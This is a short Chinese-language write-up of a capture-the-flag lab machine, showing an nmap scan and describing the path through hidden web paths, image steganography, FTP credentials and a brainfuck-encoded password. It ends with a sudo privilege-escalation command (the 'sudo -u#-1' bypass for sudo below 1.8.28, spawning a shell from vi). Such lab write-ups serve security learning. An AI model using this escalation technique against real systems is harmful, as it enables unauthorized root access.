靶机实验
信息收集
nmap扫描结果
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| [email protected]:~# nmap -T5 -p- 10.10.239.235 -sC -sV Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-01 10:34 UTC Nmap scan report for ip-10-10-239-235.eu-west-1.compute.internal (10.10.239.235) Host is up (0.00079s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA) | 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA) | 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA) |_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Apache2 Debian Default Page: It works MAC Address: 02:A7:C9:CC:F6:0C (Unknown) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
dirb扫不出什么东西,但是在assets/style.css 下发现点奇怪的东西

如果直接访问找到的页面,会直接跳转到youtube的一个视频下.抓包后发现隐藏目录

最后会发现是张图片

用zsteg读取隐藏的数据后

会给出ftp的用户名和密码
连接上去后会发现里面只有一个名为Eli’s_creds.txt的文件 看名字都知道是什么东西了.

这是段brainfuck加密后的内容,解密后出来就是eli用户的密码.
提权
ssh连接该用户后,会出现一段提示

搜索该名字后会发现该目录存在/usr/games/处

该目录下面有一个隐藏的文件,存放的就是gwendline用户的密码.切换到gwendoline用户后sudo -l 会发现

又因为sudo版本小于1.8.28版本,并且拥有sudo vi的权限,那么接下来就很简单了
输入
1 2
| sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt :!/bin/bash
|

提权成功.
总结
难度不大,主要是要细心,枚举是关键!